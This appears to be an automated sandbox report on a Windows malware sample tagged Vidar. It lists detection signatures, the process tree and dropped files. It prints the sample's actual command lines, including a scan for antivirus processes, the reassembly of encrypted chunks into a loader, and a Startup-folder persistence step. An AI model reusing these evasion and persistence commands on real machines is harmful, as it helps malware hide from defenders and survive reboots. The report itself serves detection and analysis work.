

Windows Analysis Report
ldqj18tn.exe

Overview

General Information

Sample name: ldqj18tn.exe
Analysis ID: 1577511
MD5: 574ab8397d011243cb52bef069bad2dc
SHA1: 1e1cf543bb08113fec19f9d5b9c1df25ed9232f6
SHA256: b376d8b2108027a42534314eb5d82a70b06984c7dca8e91df66d00f5c6e91f20
Tags: 18521511316185215113209, bulletproof, exe, Vidar, user-abus3reports

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ldqj18tn.exe (PID: 2276 cmdline: "C:\Users\user\Desktop\ldqj18tn.exe" MD5: 574AB8397D011243CB52BEF069BAD2DC)
    • cmd.exe (PID: 6972 cmdline: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 404 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4092 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3416 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5580 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3664 cmdline: cmd /c md 704579 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5512 cmdline: findstr /V "MARTNMSPIDERRINGTONE" Mh MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5704 cmdline: cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Organizational.pif (PID: 5884 cmdline: Organizational.pif u MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5144 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 2488 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1596 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • InnoMesh.scr (PID: 3816 cmdline: "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js", ProcessId: 1596, ProcessName: wscript.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: Organizational.pif u, CommandLine: Organizational.pif u, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: Organizational.pif u, ProcessId: 5884, ProcessName: Organizational.pif
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ProcessId: 5884, TargetFilename: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ldqj18tn.exe", ParentImage: C:\Users\user\Desktop\ldqj18tn.exe, ParentProcessId: 2276, ParentProcessName: ldqj18tn.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ProcessId: 6972, ProcessName: cmd.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ProcessId: 5884, TargetFilename: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js", ProcessId: 1596, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5144, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth", CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth", CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth", ProcessId: 5580, ProcessName: findstr.exe
No Suricata rule has matched



AV Detection

Source: ldqj18tn.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 86.0% probability
Source: ldqj18tn.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ldqj18tn.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F54005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F53CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F5FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DD4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DD494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDCD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DDFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DD3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\704579
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\704579\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: unknown | DNS traffic detected: query: zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq reply code: Name error (3)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F629BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq
Source: ldqj18tn.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ldqj18tn.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ldqj18tn.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ldqj18tn.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: ldqj18tn.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ldqj18tn.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ldqj18tn.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ldqj18tn.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ldqj18tn.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ldqj18tn.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ldqj18tn.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: ldqj18tn.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: ldqj18tn.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: ldqj18tn.exe | String found in binary or memory: http://ocsp.digicert.com0X
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.4002398623.0000000000E39000.00000002.00000001.01000000.00000008.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: ldqj18tn.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InnoMesh.scr.11.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.dr | String found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F64830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DE4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F64632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\ldqj18tn.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | Code function: 11_2_00F7D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr | Code function: 17_2_00DFD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Consequence entropy: 7.99851486835
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\International entropy: 7.99645540823
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Becoming entropy: 7.99806240446
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Gently entropy: 7.99676588989
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Estimate entropy: 7.99772169864
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Jet entropy: 7.99726981823
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Commodities entropy: 7.99796353937
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Prof entropy: 7.99639738608
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Against entropy: 7.995142844
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Required entropy: 7.9980527323
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Situations entropy: 7.99712082708
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Mood entropy: 7.99795861068
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Princess entropy: 7.99700719992
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Jessica entropy: 7.99791437325
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Traveller entropy: 7.99707087898
Source: C:\Users\user\Desktop\ldqj18tn.exe | File created: C:\Users\user\AppData\Local\Temp\Fastest entropy: 7.99719426565
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\704579\u entropy: 7.99983843208
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif | File created: C:\Users\user\AppData\Local\TechMesh Dynamics\M entropy: 7.99983843208

System Summary

Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
